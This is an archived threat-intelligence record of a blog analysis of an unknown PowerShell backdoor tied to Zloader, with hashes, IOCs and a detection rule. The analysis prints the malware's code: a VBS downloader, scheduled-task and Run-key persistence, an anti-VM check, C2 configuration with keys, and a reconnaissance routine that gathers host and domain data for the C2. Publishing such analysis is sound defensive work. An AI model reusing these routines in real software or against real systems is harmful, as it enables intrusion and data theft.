{
	"id": "1e02bf92-7736-494a-8e5a-95f555eb1f43",
	"created_at": "2026-04-06T00:09:54.201021Z",
	"updated_at": "2026-04-10T03:21:37.156925Z",
	"deleted_at": null,
	"sha1_hash": "09f2cdc36463d405924a01dc49a1d6d018bf38fa",
	"title": "Unknown powershell backdoor with ties to new Zloader",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 108033,
	"plain_text": "Unknown powershell backdoor with ties to new Zloader\r\nBy Jason Reaves\r\nPublished: 2024-07-29 · Archived: 2026-04-05 12:57:21 UTC\r\nBy: Jason Reaves and Joshua Platt\r\nRecently, while investigating a new variant[1] of Zloader/SilentNight[2], an unknown Powershell backdoor and\r\nVBS downloader were uncovered. The malware was potentially utilized alongside the new Zloader variant, which\r\nCISA publicly linked to BlackBasta[3]. The Powershell backdoor appears to have been constructed to further\r\naccess via reconnaissance activity and to deploy other malware samples, including Zloader.\r\nTechnical Details\r\nThe initial file we set about analyzing is listed below.\r\nCompilation Timestamp 2023-05-30 10:31:14 UTC\r\nMD5: e447362fb2686062a3dfc921c10dd6c7\r\nSHA-1: 544599ef72cbd97fe50e4169c8401270ff3b917b\r\nSHA-256: b513c6940ed32766e1ac544fc547b1cb53bc95eced5b5bcc140d7c6dce377afb\r\nAfter analyzing the file, two more files were found matching the same characteristics:\r\nCompilation Timestamp 2023-05-30 10:31:17 UTC\r\nMD5: 41563d1f34b704728988a53833577076\r\nSHA-1: 72a572ce8247f80946e71f637c3403228543d9a3\r\nSHA-256: 66a69d992a82681ee1d971cc2b810dd4b58c3cfd8b4506b3d62fe1e7421fb90b\r\nCompilation Timestamp 2023-05-29 16:24:50 UTC\r\nMD5: 83aa432c43f01541e4f1e2f995940e69\r\nSHA-1: 931b6fd3e7ee5631fbc583640805809d9f2acc58\r\nSHA-256: 82f33adfecd67735874cdc9c2bfd27d4b5b904c828d861544c249798a3e65e7e\r\nThe files are .NET binaries packed with AgilDotNet[4]. After painfully analyzing the initial binary, the backdoor\r\nfunctionality was unpacked and decrypted. 
An unpacked version of the powershell executor is also on VT:\r\nCompilation Timestamp 2023-07-04 21:13:57 UTC\r\nMD5: bd76d387b9bf9e30b502e367f035b8db\r\nhttps://medium.com/walmartglobaltech/unknown-powershell-backdoor-with-ties-to-new-zloader-88ca51d38850\r\nPage 1 of 7\n\nSHA-1: 67f36d508ab75441975de3e6325b023401a37d44\r\nSHA-256: 1cc0460c2eee5a0a6e80e1f7b7b332726946a9f667c76539d10dfc1cc53c63f6\r\nThe powershell script includes a hardcoded filename, for example:\r\n$myfilename = \"Uninstall_Ahl\";\r\nIf the checks fail, the malware will move itself and uninstall all the previous data. This could make updating the\r\nbots relatively easy. If the checks succeed, then it will set up a number of variables in the script:\r\n$mymd5 = (Get-FileHash -Path (Get-Process -Id $PID).Path -Algorithm MD5 | Select-Object -ExpandPrope\r\n$mypath = (Get-Process -Id $PID).Path;\r\n$programDataFolder = Join-Path $env:ProgramData \"IncrediBuild\";\r\n$installpath = Join-Path $programDataFolder ($myfilename + \".exe\");\r\n$filevb = Join-Path $programDataFolder ($myfilename + \".vbs\");\r\n$tsksh = (New-Guid).Guid;\r\nThe following VB downloader is written to disk alongside the executable file mentioned above. 
The downloader\r\ncontains a double-base64-encoded URL that is decoded to reveal the downloader site.\r\n$vbContent = @\"\r\n Set WshShell = CreateObject(\"WScript.Shell\")\r\n Set objWMIService = GetObject(\"winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2\")\r\n Set cPrs = objWMIService.ExecQuery(\"Select * from Win32_Process Where Name = 'Uninstall_Ahl.exe\r\n Function bb4(mumu)\r\n Dim oDecoder, oStream\r\n Set oDecoder = CreateObject(\"MSXML2.DOMDocument\").createElement(\"mumu\")\r\n oDecoder.dataType = \"bin.base64\"\r\n oDecoder.Text = mumu\r\n Set oStream = CreateObject(\"ADODB.Stream\")\r\n oStream.Open\r\n oStream.Type = 1 'adTypeBinary\r\n oStream.Write oDecoder.nodeTypedValue\r\n oStream.Position = 0\r\n oStream.Type = 2 'adTypeText\r\n oStream.Charset = \"us-ascii\"\r\n bb4 = oStream.ReadText\r\n oStream.Close\r\n End Function\r\n dStr = bb4(bb4(\"\u003credacted\u003e\"))\r\n If cPrs.Count = 0 Then\r\n WshShell.Run dStr, 0, True\r\n End If\r\n Set WshShell = Nothing\r\n Set objWMIService = Nothing\r\n Set cPrs = Nothing\r\n\"\r\n@;\r\nAfterwards, it executes a hardcoded curl command, which will download and execute files from the encoded\r\nURL.\r\nA check is performed to see whether it is already running before executing the above command. 
A scheduled task is installed under a\r\nhardcoded name with a random GUID appended:\r\n$filevb = Join-Path $programDataFolder ($myfilename + \".vbs\");\r\n$tsksh = (New-Guid).Guid;\r\n$actionts = New-ScheduledTaskAction -Execute $filevb;\r\n$triggerts = New-ScheduledTaskTrigger -Daily -At 12am;\r\nRegister-ScheduledTask -Action $actionts -Trigger $triggerts -TaskName \"UpdateTaskMachine{$tsksh}\";\r\nThe script then sets up a run key:\r\n$myfilename = \"Uninstall_Ahl\";\r\n$installpath = Join-Path $programDataFolder ($myfilename + \".exe\");\r\n$regPath = \"HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\";\r\n$regKeyName = [System.IO.Path]::GetFileNameWithoutExtension($installPath);\r\nSet-ItemProperty -Path $regPath -Name $regKeyName -Value \"`\"${installPath}`\"\";\r\nAdmin check:\r\nfunction CheckAdmin(){\r\n$isAdm = \"User\";\r\nif ($null -ne (whoami /groups /fo csv | ConvertFrom-Csv | Where-Object { $_.SID -eq \"S-1-5-32-544\" })) {\r\n $isAdm = \"Admin\"\r\n }\r\nreturn $isAdm\r\n}\r\nInternet connectivity check:\r\n$CheckInternet = DomainIpAddressRecord(\"google.com\");\r\nwhile (!$CheckInternet) {\r\n Start-Sleep -Seconds (600);\r\n }\r\nInside the script reside some heavily obfuscated sections that look very similar to JSF**k[5] but for powershell\r\ncode. The obfuscated code wrapper appeared to overlap with a powershell backdoor spread in May of 2023[6]. We\r\nextracted the code blobs, and after careful analysis some structure began to appear.\r\n('@@@'|% {${]} =+$() }{${!}=${]}} {${%=}=++ ${]} } {${(} = ( ${]} = ${]}+${%=}) } { $\r\n...snip...\r\n ${[';}${%=}${!}${~!(}+${[';}${%=}${!}${%=} +${[';}${)./}${(} + ${[';}${)./}${[} + ${[';}${+=}${\r\nIn reality, there are two things going on. One is the evaluation of the obfuscated data between the | symbols, which\r\ncontain two main blocks of functionality. 
The other is the building of the values needed to re-assemble and\r\nmanipulate the content. After the main block is executed, the result is piped out to ‘.’ for detonation. Modifying\r\nthe script to replace the final evaluation statement with the following lets us inspect the reassembled code instead of executing it:\r\n| Write-Output\r\nAlternatively, we can leverage Box-PS[7], which makes the obfuscation much easier to get through. As we get\r\ninto the layers, the first blob of code is an anti-VM check:\r\n$computerSystem = Get-WmiObject Win32_ComputerSystem;\r\n$model = $computerSystem.Model;\r\nif ($model -like '*VirtualBox*' -or $model -like '*Virtual*'){exit}\r\nDecoding the rest of the layers, we see the bot config:\r\n$botnet = \"Amazon\";\r\n$botver = \"0.1\";\r\n$knocktime = 300;\r\n$uuid = (Get-CimInstance Win32_ComputerSystemProduct).UUID;\r\n$admin_url = \"hxxps://aerofly.]live/api/v3/\";\r\n$passkey = \"12345678901234567890123456789012\";\r\n$iv = \"\u00269*zS7LY%ZN1thfI\";\r\n$secureKey = \"56e620b9e45120dfd1c534aee0b10c9eb3fc3948e7564cda3313a2ed456706e8\";\r\nThe next block builds the information the bot sends to the C2, along with its responses to\r\ncommands issued:\r\nfunction base64header($myVar) {\r\n try {\r\n $myVariable = @();\r\n $myVariable += \"BOTID:$env:COMPUTERNAME\" + \"_\" + (Get-CimInstance Win32_ComputerSystemProduct\r\n $myVariable += \"UUID:\" + $uuid;\r\n $myVariable += \"Username:$env:USERNAME\";\r\n $myVariable += \"Botnet:\" + $botnet;\r\n $myVariable += \"Version:\" + $botver;\r\n $myVariable += \"FileName:\" + (Get-Process -Id $PID).Name;\r\n $myVariable += \"URL:\" + $script:url;\r\n $myVariable += \"MD5:\" + (Get-FileHash -Path (Get-Process -Id $PID).Path -Algorithm MD5 | Selec\r\n $myVariable += $myVar;\r\n $myVariableString = $myVariable | Out-String;\r\n $bytes = [System.Text.Encoding]::UTF8.GetBytes($myVariableString);\r\n 
$base64EncodedString = [System.Convert]::ToBase64String($bytes);\r\n $TempData = @{\r\n \"infohead\" = (Get-CimInstance Win32_ComputerSystemProduct).UUID;\r\n \"data64\" = $base64EncodedString;\r\n } | ConvertTo-Json;\r\n return EncryptString $TempData;\r\n } catch {\r\n Write-Host \"Error in base64header\";\r\n return $null;\r\n }\r\n}\r\nThe encryption referenced here (EncryptString and its counterpart DecryptString) uses AES in CBC mode:\r\nFunction DecryptString {\r\n Param([string] $encryptedStr)\r\n try {\r\n $enc = [System.Text.Encoding]::UTF8;\r\n $AES = New-Object System.Security.Cryptography.AESManaged;\r\n $AES.Mode = [System.Security.Cryptography.CipherMode]::CBC;\r\n $AES.BlockSize = 128;\r\n $AES.KeySize = 256;\r\n $AES.IV = $e\r\nThe function below performs reconnaissance, gathering additional machine information and encoding all the data that will be\r\nsent to the C2 during the initial run:\r\nfunction PCInfoBytes() {\r\n $myVariable = @();\r\n $myVariable += \"BOTID:$env:COMPUTERNAME\" + \"_\" + (Get-CimInstance Win32_ComputerSystemProduct).UU\r\n $myVariable += \"Hostname:$env:COMPUTERNAME\";\r\n $myVariable += \"UUID:\" + (Get-CimInstance Win32_ComputerSystemProduct).UUID;\r\n $myVariable += \"Botnet:\" + \"$botnet\";\r\n $myVariable += \"Version:\" + \"0.1\";\r\n $myVariable += \"FileName:\" + (Get-Process -Id $PID).Name;\r\n $myVariable += \"UserType:\" + (CheckAdmin);\r\n $myVariable += \"AntiVirus:\" + (Get-WmiObject -Namespace \"root\\\\SecurityCenter2\" -Class \"Antiviru\r\n $myVariable += \"OS:\" + (Get-WmiObject -Class Win32_OperatingSystem).Caption;\r\n $myVariable += \"CPU:\" + (Get-WmiObject -Class Win32_Processor).Name;\r\n $myVariable += \"Cores:\" + (Get-WmiObject -Class Win32_Processor).NumberOfCores;\r\n $myVariable += \"RAM:\" + [Math]::Round((Get-WmiObject -Class Win32_ComputerSystem).TotalPhysicalMe\r\n $myVariable += \"Video:\" + (Get-WmiObject 
Win32_VideoController).Caption;\r\n $myVariable += \"Monitors:\" + (Get-WmiObject WmiMonitorID -Namespace root\\\\wmi -ErrorAction Silen\r\n $myVariable += \"URL:\" + $script:url;\r\n $myVariable += \"MD5:\" + (Get-FileHash -Path (Get-Process -Id $PID).Path -Algorithm MD5 | Select-Ob\r\n $myVariable += get-wmiobject Win32_ComputerSystem;\r\n $myVariable += get-wmiobject Win32_BIOS;\r\n $myVariable += ipconfig /all;\r\n $myVariable += net config workstation;\r\n $myVariable += net view /all;\r\n $myVariable += net view /all /domain;\r\n $myVariable += nltest /domain_trusts;\r\n $myVariable += nltest /domain_trusts /all_trusts;\r\n $myVariable += \"`n\";\r\n $myVariable += \"Installed Programs`n-------------------------------------------------------------\r\n $myVariable += Get-Package | Where-Object {\r\n $_.ProviderName -ne \"msu\"\r\n } | Select-Object Name, Version | Sort-Object Name | Out-String;\r\n $myVariable += Get-Hotfix | Select-Object HotFixID, InstalledOn | Out-String;\r\n $myVariableString = $myVariable | Out-String;\r\n $bytes = [System.Text.Encoding]::UTF8.GetBytes($myVariableString);\r\n $base64EncodedString = [System.Convert]::ToBase64String($bytes);\r\n $TempData = @{\r\n \"infohead\" = (Get-CimInstance Win32_ComputerSystemProduct).UUID;\r\n \"data64\" = $base64EncodedString;\r\n } | ConvertTo-Json;\r\n return EncryptString $TempData;\r\n}\r\nINDICATORS OF COMPROMISE (IOCs)\r\nSHA-256: 66a69d992a82681ee1d971cc2b810dd4b58c3cfd8b4506b3d62fe1e7421fb90b\r\nSHA-256: b513c6940ed32766e1ac544fc547b1cb53bc95eced5b5bcc140d7c6dce377afb\r\nSHA-256: 82f33adfecd67735874cdc9c2bfd27d4b5b904c828d861544c249798a3e65e7e\r\nSHA-256: 1cc0460c2eee5a0a6e80e1f7b7b332726946a9f667c76539d10dfc1cc53c63f6\r\nalert http $HOME_NET any 
-\u003e $EXTERNAL_NET any (msg:\"PshellBkdr C2 traffic known Bearer\"; content:\"POS\r\nReferences\r\n[1] https://www.zscaler.com/blogs/security-research/zloader-no-longer-silent-night\r\n[2] https://www.deepwatch.com/blog/guess-whos-back-zloaders-back-back-again/\r\n[3] https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-131a\r\n[4] https://secureteam.net/acode-features-detailed\r\n[5] https://jsf**k.com/\r\n[6] https://cert.pl/en/posts/2023/05/powerdash-malspam/\r\n[7] https://github.com/ConnorShride/box-ps\r\nSource: https://medium.com/walmartglobaltech/unknown-powershell-backdoor-with-ties-to-new-zloader-88ca51d38850",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://medium.com/walmartglobaltech/unknown-powershell-backdoor-with-ties-to-new-zloader-88ca51d38850"
	],
	"report_names": [
		"unknown-powershell-backdoor-with-ties-to-new-zloader-88ca51d38850"
	],
	"threat_actors": [],
	"ts_created_at": 1775434194,
	"ts_updated_at": 1775791297,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/09f2cdc36463d405924a01dc49a1d6d018bf38fa.pdf",
		"text": "https://archive.orkl.eu/09f2cdc36463d405924a01dc49a1d6d018bf38fa.txt",
		"img": "https://archive.orkl.eu/09f2cdc36463d405924a01dc49a1d6d018bf38fa.jpg"
	}
}